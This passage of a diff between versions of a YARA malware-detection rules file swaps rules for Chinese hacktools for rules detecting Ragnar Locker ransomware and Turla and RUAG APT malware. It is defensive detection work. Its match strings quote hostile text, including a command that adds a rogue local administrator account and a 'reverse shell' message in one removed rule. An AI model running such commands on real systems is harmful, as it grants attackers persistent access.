+		modified = "2022-12-07"
+		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/log_teamviewer_keyboard_layouts.yar#L23-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"
-		logic_hash = "2865b50e6a323462fab39bd84571939c618cf6f00e147039f6e699ba4d195a00"
-		score = 75
+		logic_hash = "9de52ec41fb410fcff50d49eb7871eadd07b520c3cfa089e1eeecc580e610eaa"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		limit = "Logscan"
 
 	strings:
-		$s0 = "!Win32 .EXE." fullword ascii
-		$s1 = ".MPRESS1" fullword ascii
-		$s2 = ".MPRESS2" fullword ascii
-		$s3 = "XOLEHLP.dll" fullword ascii
-		$s4 = "</body></html>" fullword ascii
-		$s8 = "DtcGetTransactionManagerExA" fullword ascii
-		$s9 = "GetUserNameA" fullword ascii
+		$x1 = "Changing keyboard layout to: 0419" ascii
+		$fp1 = "Changing keyboard layout to: 04190419" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		#x1> #fp1
 }
-rule SIGNATURE_BASE_Arpsniffer : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Ragna_Locker_Apr20_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file arpsniffer.exe"
+		description = "Detects Ragna Locker Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "78db3b18-008a-5a4e-9504-0cbe3b852046"
-		date = "2015-06-13"
+		id = "67164cb4-73b7-5c4e-88f9-42379b88c641"
+		date = "2020-04-27"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1489-L1506"
+		reference = "https://otx.alienvault.com/indicator/file/c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_ragna_locker.yar#L3-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"
-		logic_hash = "eb0a425be0fff87eb58689a4eee4b6729e8ee985e6224790111322d4b182caf1"
+		logic_hash = "05a18818f22c836c3e1f1fa9682d787bbe86e6d3bb026a80a7d4c33ad95c2cd3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
 
 	strings:
-		$s1 = "SHELL" ascii
-		$s2 = "PacketSendPacket" fullword ascii
-		$s3 = "ArpSniff" ascii
-		$s4 = "pcap_loop" fullword ascii
-		$s5 = "packet.dll" fullword ascii
+		$x1 = "---RAGNAR SECRET---" ascii
+		$xc1 = { 0D 0A 25 73 0D 0A 0D 0A 25 73 0D 0A 25 73 0D 0A
+               25 73 0D 0A 0D 0A 25 73 0D 0A 00 00 2E 00 72 00
+               61 00 67 00 6E 00 61 00 72 00 5F }
+		$xc2 = { 00 2D 00 66 00 6F 00 72 00 63 00 65 00 00 00 00
+               00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C
+               00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00
+               00 5C 00 6E 00 6F 00 74 00 65 00 70 00 61 00 64
+               00 2E 00 65 00 78 00 65 00 }
+		$s1 = "bootfont.bin" wide fullword
+		$sc2 = { 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 00
+               00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 2E
+               00 6F 00 6C 00 64 00 00 00 54 00 6F 00 72 00 20
+               00 62 00 72 00 6F 00 77 00 73 00 65 00 72 00 }
+		$op1 = { c7 85 58 ff ff ff 55 00 6b 00 c7 85 5c ff ff ff }
+		$op2 = { 50 c7 85 7a ff ff ff 5c }
+		$op3 = { 8b 75 08 8a 84 0d 20 ff ff ff ff 45 08 32 06 8b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_Pw_Inspector_2 : FILE
+
+rule SIGNATURE_BASE_MAL_Ransom_Ragnarlocker_July_2020_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file pw-inspector.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "795c7009-93a8-57c4-8554-f0ed5c1d50f8"
-		date = "2015-06-13"
+		description = "Detects Ragnarlocker by strings (July 2020)"
+		author = "Arkbird_SOLG"
+		id = "60e09057-d9f8-5e89-8f47-c5dda32806c6"
+		date = "2020-07-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1508-L1524"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_ragna_locker.yar#L38-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"
-		logic_hash = "7d2021ff471f03deb9e6d8b62fcb218ae3198f21fd7b8fa1fdd9b96228b8c2f8"
+		logic_hash = "dc44da2f9023e0702afa8081e85ba817ebfde15f449261fae9de729d51262b04"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
 
 	strings:
-		$s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
-		$s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
-		$s3 = "PW-Inspector" fullword ascii
-		$s4 = "i:o:m:M:c:lunps" fullword ascii
+		$f1 = "bootfont.bin" fullword wide
+		$f2 = "bootmgr.efi" fullword wide
+		$f3 = "bootsect.bak" fullword wide
+		$r1 = "$!.txt" fullword wide
+		$r2 = "---BEGIN KEY R_R---" fullword ascii
+		$r3 = "!$R4GN4R_" wide
+		$r4 = "RAGNRPW" fullword ascii
+		$r5 = "---END KEY R_R---" fullword ascii
+		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
+		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
+		$a3 = "WinSta0\\Default" fullword wide
+		$a4 = "%s-%s-%s-%s-%s" fullword wide
+		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
+		$c1 = "-backup" fullword wide
+		$c2 = "-force" fullword wide
+		$c3 = "-vmback" fullword wide
+		$c4 = "-list" fullword wide
+		$s1 = ".ragn@r_" wide
+		$s2 = "\\notepad.exe" wide
+		$s3 = "Opera Software" fullword wide
+		$s4 = "Tor browser" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
 }
-rule SIGNATURE_BASE_Datpcshare : FILE
+rule SIGNATURE_BASE_Turla_APT_Srsvc : TURLA FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file datPcShare.exe"
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1bf44c0d-6aa7-5486-baee-c17d3e82403f"
-		date = "2015-06-13"
+		id = "951ee9f8-1ab0-5fd5-be9b-053ec82f6ea2"
+		date = "2016-06-09"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1526-L1542"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"
-		logic_hash = "15297a8019192371032fc11b966d1a89d951c176da6d64e80ca5a201f55341c0"
+		logic_hash = "76bd2aacde66114090d1c1767da64728219230964a0bc78a5d830819c46bac3a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "TURLA, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		family = "Turla"
+		hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
+		hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"
 
 	strings:
-		$s1 = "PcShare.EXE" fullword wide
-		$s2 = "MZKERNEL32.DLL" fullword ascii
-		$s3 = "PcShare" fullword wide
-		$s4 = "QQ:4564405" fullword wide
+		$x1 = "SVCHostServiceDll.dll" fullword ascii
+		$s2 = "msimghlp.dll" fullword wide
+		$s3 = "srservice" fullword wide
+		$s4 = "ModStart" fullword ascii
+		$s5 = "ModStop" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Tools_Xport : FILE
+rule SIGNATURE_BASE_Turla_APT_Malware_Gen1 : TURLA FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xport.exe"
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3223fe5b-6135-5530-a5eb-10c44f3f6277"
-		date = "2015-06-13"
+		id = "7ead2da1-3544-5a26-8767-6d3f29de8b96"
+		date = "2016-06-09"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1544-L1565"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L33-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9584de562e7f8185f721e94ee3cceac60db26dda"
-		logic_hash = "9eea73732643f74b4802af0672f5c3ab09cc54cfecd80f8903efc26b7ceaec29"
+		logic_hash = "3676d01d5e4044fd49292eb7b4376ff90f0a41141f89a19b13c5518b01257be3"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "TURLA, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		family = "Turla"
+		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
+		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
+		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
+		hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
+		hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
+		hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
+		hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
 
 	strings:
-		$s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii
-		$s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii
-		$s3 = "%s - command line port scanner" fullword ascii
-		$s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii
-		$s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii
-		$s6 = ".\\port.ini" fullword ascii
-		$s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii
-		$s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii
-		$s9 = "http://www.xfocus.org" fullword ascii
+		$x1 = "too long data for this type of transport" fullword ascii
+		$x2 = "not enough server resources to complete operation" fullword ascii
+		$x3 = "Task not execute. Arg file failed." fullword ascii
+		$x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii
+		$s1 = "peer has closed the connection" fullword ascii
+		$s2 = "tcpdump.exe" fullword ascii
+		$s3 = "windump.exe" fullword ascii
+		$s4 = "dsniff.exe" fullword ascii
+		$s5 = "wireshark.exe" fullword ascii
+		$s6 = "ethereal.exe" fullword ascii
+		$s7 = "snoop.exe" fullword ascii
+		$s8 = "ettercap.exe" fullword ascii
+		$s9 = "miniport.dat" fullword ascii
+		$s10 = "net_password=%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 2 of ( $x* ) or 8 of ( $s* ) ) ) or ( 12 of them )
 }
-rule SIGNATURE_BASE_Pc_Xai : FILE
+rule SIGNATURE_BASE_RUAG_APT_Malware_Gen2 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xai.exe"
+		description = "Detects malware used in the RUAG APT case"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcf1b57b-3616-5198-bd57-18505fee91ae"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1567-L1586"
+		id = "8a50e5d5-f16d-53c7-825c-a8e51c207eac"
+		date = "2016-06-09"
+		modified = "2023-01-06"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L73-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"
-		logic_hash = "80659fcf1721b20f459ac0480401bdf643c95b46118d03320bc6d4e4ee4b67f7"
-		score = 75
-		quality = 60
+		logic_hash = "62c65a5c85930dd2a928508401113ffba28bc6a07188d9bf5c68234bea10e1aa"
+		score = 90
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
+		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
+		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
 
 	strings:
-		$s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/" fullword wide
-		$s2 = "%SystemRoot%\\System32\\" ascii
-		$s3 = "%APPDATA%\\" ascii
-		$s4 = "---- C.Rufus Security Team ----" fullword wide
-		$s5 = "www.snzzkz.com" fullword wide
-		$s6 = "%CommonProgramFiles%\\" ascii
-		$s7 = "GetRand.dll" fullword ascii
+		$x1 = "Internal command not support =((" ascii
+		$x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii
+		$x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii
+		$x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii
+		$x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii
+		$x6 = "L|-1|try to run dll %s with user priv|" fullword ascii
+		$x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii
+		$x8 = "\\\\%s\\pipe\\comnode" fullword ascii
+		$x9 = "Plugin dll stop failed." fullword ascii
+		$x10 = "AS_USER:LogonUser():%d" fullword ascii
+		$s1 = "MSIMGHLP.DLL" fullword wide
+		$s2 = "msimghlp.dll" fullword ascii
+		$s3 = "ximarsh.dll" fullword ascii
+		$s4 = "msximl.dll" fullword ascii
+		$s5 = "INTERNAL.dll" fullword ascii
+		$s6 = "\\\\.\\Global\\PIPE\\" ascii
+		$s7 = "ieuser.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 10 of them )
 }
-rule SIGNATURE_BASE_Radmin_Hash : FILE
+rule SIGNATURE_BASE_Turla_APT_Malware_Gen3 : TURLA FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Radmin_Hash.exe"
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07761e81-15b4-5639-b766-8dc3f16e2b7a"
-		date = "2015-06-13"
+		id = "8cb7d873-e4f9-553e-84e8-dbc0d31f65ab"
+		date = "2016-06-09"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1588-L1605"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L110-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"
-		logic_hash = "d6ee13a2ed30bb44471593386521f67be0d6ccd6f8a0ebf8557012a099f81d3d"
+		logic_hash = "8c24cf71841efc974c8a4d8eb5662137592c1d454821c9beadc50d83cb19333c"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "TURLA, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		family = "Turla"
+		hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
+		hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
+		hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
+		hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
+		hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
+		hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
 
 	strings:
-		$s1 = "<description>IEBars</description>" fullword ascii
-		$s2 = "PECompact2" fullword ascii
-		$s3 = "Radmin, Remote Administrator" fullword wide
-		$s4 = "Radmin 3.0 Hash " fullword wide
-		$s5 = "HASH1.0" fullword wide
+		$x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii
+		$x2 = "WaitMutex Abandoned %p" fullword ascii
+		$x3 = "OPER|Wrong config: no port|" fullword ascii
+		$x4 = "OPER|Wrong config: no lastconnect|" fullword ascii
+		$x5 = "OPER|Wrong config: empty address|" fullword ascii
+		$x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii
+		$x7 = "OPER|Wrong config: no auth|" fullword ascii
+		$x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii
+		$s3 = "www.yahoo.com" fullword ascii
+		$s4 = "MSXIML.DLL" fullword wide
+		$s5 = "www.bing.com" fullword ascii
+		$s6 = "%s: http://%s%s" fullword ascii
+		$s7 = "/javascript/view.php" fullword ascii
+		$s8 = "Task %d failed %s,%d" fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 6 of ( $s* ) ) ) or ( 10 of them )
 }
-rule SIGNATURE_BASE_Oseditor : FILE
+rule SIGNATURE_BASE_Turla_Mal_Script_Jan18_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file OSEditor.exe"
+		description = "Detects Turla malicious script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b308852c-3436-5748-9ba6-82d4c3c5fc14"
-		date = "2015-06-13"
+		id = "4b550b3c-182c-5dc0-b2d2-13925c22be81"
+		date = "2018-01-19"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1607-L1624"
+		reference = "https://ghostbin.com/paste/jsph7"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L152-L169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"
-		logic_hash = "6531c0b3c0f6123d9eda34ed028f05054e4805e5c329da4b29e4f37f9b5fc1b2"
+		logic_hash = "2386abf8afdf8ed9cfd55cb3dcbb998eb732744c601fd9af701cf64c366a0e62"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc"
 
 	strings:
-		$s1 = "OSEditor.exe" fullword wide
-		$s2 = "netsafe" wide
-		$s3 = "OSC Editor" fullword wide
-		$s4 = "GIF89" ascii
-		$s5 = "Unlock" ascii
+		$s1 = ".charCodeAt(i % " ascii
+		$s2 = "{WScript.Quit();}" fullword ascii
+		$s3 = ".charAt(i)) << 10) |" ascii
+		$s4 = " = WScript.Arguments;var " ascii
+		$s5 = "= \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var i;" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Goodtoolset_Ms11011 : FILE
+
+rule SIGNATURE_BASE_Turla_Kazuarrat : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11011.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "689b7ea3-6707-5f99-8232-438d903d414d"
-		date = "2015-06-13"
+		description = "Detects Turla Kazuar RAT described by DrunkBinary"
+		author = "Markus Neis / Florian Roth"
+		id = "147cc7b7-6dbd-51a2-9501-bcbaec32e20e"
+		date = "2018-04-08"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1626-L1642"
+		reference = "https://twitter.com/DrunkBinary/status/982969891975319553"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L173-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
-		logic_hash = "99dd27eba7da44c71098446e17abfe626de91e899e28c2d2e99e7b54b9e0c825"
+		logic_hash = "d7f15fe8e33a9e3516eab5c3c5664aeee25d1d153f01b888a50dd2accba432ca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6b5d9fca6f49a044fd94c816e258bf50b1e90305d7dab2e0480349e80ed2a0fa"
+		hash2 = "7594fab1aadc4fb08fb9dbb27c418e8bc7f08dadb2acf5533dc8560241ecfc1d"
+		hash3 = "4e5a86e33e53931afe25a8cb108f53f9c7e6c6a731b0ef4f72ce638d0ea5c198"
 
 	strings:
-		$s0 = "\\i386\\Hello.pdb" ascii
-		$s1 = "OS not supported." fullword ascii
-		$s3 = "Not supported." fullword wide
-		$s4 = "SystemDefaultEUDCFont" fullword wide
+		$x1 = "~1.EXE" wide
+		$s2 = "dl32.dll" fullword ascii
+		$s3 = "HookProc@" ascii
+		$s4 = "0`.wtf" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "682156c4380c216ff8cb766a2f2e8817" or 2 of them )
 }
-rule SIGNATURE_BASE_Freeversion_Release : FILE
+rule SIGNATURE_BASE_MAL_Turla_Agent_BTZ : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file release.exe"
+		description = "Detects Turla Agent.BTZ"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a603634-a00a-5f8b-a47d-c3c8065a5c3e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1644-L1662"
+		id = "bd642f11-19f6-5178-b978-1215215fea86"
+		date = "2018-04-12"
+		modified = "2023-01-06"
+		reference = "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L195-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"
-		logic_hash = "38722afb3b955aced2e68e2048a3268722524f61784dcb45c6a695b5684230eb"
-		score = 75
+		logic_hash = "3a091d29ef5981b9ab9c0e4114fef9de70acbcbc8ea8518183a567459e1086fa"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8"
 
 	strings:
-		$s1 = "-->Got WMI process Pid: %d " ascii
-		$s2 = "This exploit will execute \"net user " ascii
-		$s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii
-		$s4 = "Running reverse shell" ascii
-		$s5 = "wmiprvse.exe" fullword ascii
-		$s6 = "SELECT * FROM IIsWebInfo" fullword ascii
+		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
+		$x3 = "mstotreg.dat" fullword ascii
+		$x4 = "Bisuninst.bin" fullword ascii
+		$x5 = "mfc42l00.pdb" fullword ascii
+		$x6 = "ielocal~f.tmp" fullword ascii
+		$s1 = "%s\\1.txt" fullword ascii
+		$s2 = "%windows%" fullword ascii
+		$s3 = "%s\\system32" fullword ascii
+		$s4 = "\\Help\\SYSTEM32\\" ascii
+		$s5 = "%windows%\\mfc42l00.pdb" ascii
+		$s6 = "Size of log(%dB) is too big, stop write." fullword ascii
